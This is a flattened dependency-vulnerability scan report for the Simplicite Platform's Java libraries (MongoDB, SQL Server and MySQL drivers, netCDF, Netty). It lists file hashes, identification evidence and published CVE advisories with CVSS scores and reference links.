http://mimepull.java.net Highest Product file name mimepull High Product jar package name jvnet Highest Product jar package name mimepull Highest Product Manifest bundle-docurl http://www.oracle.com/ Low Product Manifest Bundle-Name MIME streaming extension Medium Product Manifest bundle-symbolicname org.jvnet.mimepull Medium Product Manifest implementation-build-id tags/mimepull-1.9.3-198, 2013-04-19T09:41:12+0000 Low Product Manifest Implementation-Title MIME streaming extension High Product pom artifactid mimepull Highest Product pom developer email jitendra.kotamraju@oracle.com Low Product pom developer email martin.grebac@oracle.com Low Product pom developer name Jitendra Kotamraju Low Product pom developer name Martin Grebac Low Product pom developer org Oracle Corporation Low Product pom groupid org.jvnet.mimepull Highest Product pom name MIME streaming extension High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com/ Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://mimepull.java.net Medium Version file version 1.9.3 High Version Manifest Bundle-Version 1.9.3 High Version Manifest Implementation-Version 1.9.3 High Version pom parent-version 1.9.3 Low Version pom version 1.9.3 Highest
mongodb-driver-core-3.11.0.jarDescription:
The Java operations layer for the MongoDB Java Driver.
Third parties can wrap this layer to provide custom higher-level APIs License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/mongodb/mongodb-driver-core/3.11.0/mongodb-driver-core-3.11.0.jar
MD5: e62d9fd039afce756432e537a8c0f0c2
SHA1: af6b55599d9b2d8c1dd5ba2eb5e6095583d13969
SHA256: fbcf6f4993d7fefba5e39abd7f62e4aafad1b578968f94f8fd138c68efd8e39a
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name mongodb-driver-core High Vendor jar package name mongodb Highest Vendor jar package name operations Highest Vendor Manifest automatic-module-name org.mongodb.driver.core Medium Vendor Manifest bundle-symbolicname org.mongodb.driver-core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid mongodb-driver-core Highest Vendor pom artifactid mongodb-driver-core Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name MongoDB Java Driver Core High Vendor pom url http://www.mongodb.org Highest Product file name mongodb-driver-core High Product jar package name mongodb Highest Product jar package name operations Highest Product Manifest automatic-module-name org.mongodb.driver.core Medium Product Manifest Bundle-Name mongodb-driver-core Medium Product Manifest bundle-symbolicname org.mongodb.driver-core Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid mongodb-driver-core Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name MongoDB Java Driver Core High Product pom url http://www.mongodb.org Medium Version file version 3.11.0 High Version Manifest build-version 3.11.0 Medium Version Manifest Bundle-Version 3.11.0 High Version pom version 3.11.0 Highest
Related Dependencies mongodb-driver-3.11.0.jarFile Path: /var/simplicite/.m2/repository/org/mongodb/mongodb-driver/3.11.0/mongodb-driver-3.11.0.jar MD5: 43dd8d23d9b96f2a06ce11e97b66e750 SHA1: 26a39c8248012d0acb5613eacacf9d0957fc2864 SHA256: dfcbc1a1aba1e530e0f5b580dc99be4fcfc092d0005419236e1bae4f4e056ccc pkg:maven/org.mongodb/mongodb-driver@3.11.0 CVE-2021-20328 suppress
Specific versions of the Java driver that support client-side field level encryption (CSFLE) fail to perform correct host name verification on the KMS server’s certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Java driver and the KMS service rendering Field Level Encryption ineffective. This issue was discovered during internal testing and affects all versions of the Java driver that support CSFLE. The Java async, Scala, and reactive streams drivers are not impacted. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services originating from applications residing inside the AWS, GCP, and Azure network fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don’t use Field Level Encryption. CWE-295 Improper Certificate Validation
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:A/AC:M/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.8) Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions: (show all )
mssql-jdbc-12.2.0.jre8.jarDescription:
Microsoft JDBC Driver for SQL Server.
License:
MIT License: http://www.opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/com/microsoft/sqlserver/mssql-jdbc/12.2.0.jre8/mssql-jdbc-12.2.0.jre8.jar
MD5: 06ec244736a3f34258fac4c32fb76d07
SHA1: 24230b89715e4a101e1f2263293a2343a710ecd1
SHA256: 7f1d146d53f61261de22e1af910c43329fb59ef4299041ae6705ec711c418548
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name mssql-jdbc High Vendor jar package name jdbc Highest Vendor jar package name microsoft Highest Vendor jar package name mssql Highest Vendor jar package name sql Highest Vendor jar package name sqlserver Highest Vendor Manifest build-jdk-spec 19 Low Vendor Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid mssql-jdbc Highest Vendor pom artifactid mssql-jdbc Low Vendor pom developer org Microsoft Medium Vendor pom developer org URL http://www.microsoft.com Medium Vendor pom groupid com.microsoft.sqlserver Highest Vendor pom name Microsoft JDBC Driver for SQL Server High Vendor pom organization name Microsoft Corporation High Vendor pom url Microsoft/mssql-jdbc Highest Product file name mssql-jdbc High Product jar package name jdbc Highest Product jar package name microsoft Highest Product jar package name mssql Highest Product jar package name osgi Highest Product jar package name sql Highest Product jar package name sqlserver Highest Product Manifest build-jdk-spec 19 Low Product Manifest Bundle-Name Microsoft JDBC Driver for SQL Server Medium Product Manifest bundle-symbolicname com.microsoft.sqlserver.mssql-jdbc Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid mssql-jdbc Highest Product pom developer org Microsoft Low Product pom developer org URL http://www.microsoft.com Low Product pom groupid com.microsoft.sqlserver Highest Product pom name Microsoft JDBC Driver for SQL Server High Product pom organization name Microsoft Corporation Low Product pom url Microsoft/mssql-jdbc High Version file version 12.2.0.jre8 High Version pom version 12.2.0.jre8 Highest
mysql-connector-j-8.1.0.jarDescription:
JDBC Type 4 driver for MySQL. License:
The GNU General Public License, v2 with Universal FOSS Exception, v1.0 File Path: /var/simplicite/.m2/repository/com/mysql/mysql-connector-j/8.1.0/mysql-connector-j-8.1.0.jar
MD5: e84fdafa40e6625878f79efc7339d93b
SHA1: 3f78d2963935f44a61edb3961a591cdc392c8941
SHA256: e2e657e9c5ebe06a73485c9739ebd8a18e7bebb852a58d0da287da850beca1c7
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name mysql-connector-j High Vendor hint analyzer vendor oracle Highest Vendor hint analyzer (hint) vendor sun Highest Vendor jar package name cj Highest Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name mysql Highest Vendor jar package name type Highest Vendor Manifest bundle-symbolicname com.mysql.cj Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.mysql Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor pom artifactid mysql-connector-j Highest Vendor pom artifactid mysql-connector-j Low Vendor pom developer email filipe.silva@oracle.com Low Vendor pom developer name Filipe Silva Medium Vendor pom developer org Oracle Corporation Medium Vendor pom developer org URL https://www.oracle.com/ Medium Vendor pom groupid com.mysql Highest Vendor pom name MySQL Connector/J High Vendor pom organization name Oracle Corporation High Vendor pom organization url https://www.oracle.com/ Medium Vendor pom url http://dev.mysql.com/doc/connector-j/en/ Highest Product file name mysql-connector-j High Product hint analyzer product mysql_connector/j Highest Product hint analyzer product mysql_connector_j Highest Product hint analyzer product mysql_connectors Highest Product jar package name cj Highest Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name mysql Highest Product jar package name type Highest Product jar package name xdevapi Highest Product Manifest Bundle-Name Oracle Corporation's JDBC and XDevAPI Driver for MySQL Medium Product Manifest bundle-symbolicname com.mysql.cj Medium Product Manifest Implementation-Title MySQL Connector/J High Product Manifest specification-title JDBC Medium Product pom artifactid mysql-connector-j Highest Product pom developer email filipe.silva@oracle.com Low Product pom developer name Filipe Silva Low Product pom developer org Oracle Corporation Low Product pom developer org URL https://www.oracle.com/ Low Product pom groupid com.mysql Highest Product pom name MySQL Connector/J High Product pom organization name Oracle Corporation Low Product pom organization url https://www.oracle.com/ Low Product pom url http://dev.mysql.com/doc/connector-j/en/ Medium Version file version 8.1.0 High Version Manifest Bundle-Version 8.1.0 High Version Manifest Implementation-Version 8.1.0 High Version pom version 8.1.0 Highest
CVE-2023-22102 suppress
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.1.0 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H). NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (8.3) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
netcdf4-4.5.5.jarFile Path: /var/simplicite/.m2/repository/edu/ucar/netcdf4/4.5.5/netcdf4-4.5.5.jarMD5: 5f14df469295650fd65748a003c9ba56SHA1: 0675d63ecc857c50dd50858011b670160aa30b62SHA256: 131e3983dcf001677be069a7471797a4a9ad2c9783e88db56e32506cf1039635Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netcdf4 High Vendor jar package name jni Highest Vendor jar package name netcdf Highest Vendor jar package name ucar Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid netcdf4 Highest Vendor pom artifactid netcdf4 Low Vendor pom groupid edu.ucar Highest Vendor pom name netCDF-4 IOSP JNI connection to C library High Vendor pom parent-artifactid thredds-parent Low Product file name netcdf4 High Product jar package name jni Highest Product jar package name netcdf Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title netCDF-4 IOSP JNI connection to C library High Product pom artifactid netcdf4 Highest Product pom groupid edu.ucar Highest Product pom name netCDF-4 IOSP JNI connection to C library High Product pom parent-artifactid thredds-parent Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
netty-codec-4.1.49.Final.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/io/netty/netty-codec/4.1.49.Final/netty-codec-4.1.49.Final.jar
MD5: d93ec0a7903c28b2b4c74eda0912aa41
SHA1: 20218de83c906348283f548c255650fd06030424
SHA256: 670c1f09d43b6e881437296ce6e8fa7f8dcb1eaef78b2144d61234d6515b47af
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netty-codec High Vendor jar package name codec Highest Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.codec Medium Vendor Manifest bundle-docurl https://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.codec Medium Vendor Manifest implementation-url https://netty.io/netty-codec/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid netty-codec Highest Vendor pom artifactid netty-codec Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec High Vendor pom parent-artifactid netty-parent Low Product file name netty-codec High Product jar package name codec Highest Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.codec Medium Product Manifest bundle-docurl https://netty.io/ Low Product Manifest Bundle-Name Netty/Codec Medium Product Manifest bundle-symbolicname io.netty.codec Medium Product Manifest Implementation-Title Netty/Codec High Product Manifest implementation-url https://netty.io/netty-codec/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid netty-codec Highest Product pom groupid io.netty Highest Product pom name Netty/Codec High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.49.Final High Version Manifest Implementation-Version 4.1.49.Final High Version pom version 4.1.49.Final Highest
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-41915 (OSSINDEX) suppress
Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeadesr.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call, into a `remove()` call, and call `add()` in a loop over the iterator of values.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-41915 for details CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec:4.1.49.Final:*:*:*:*:*:*:* CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - 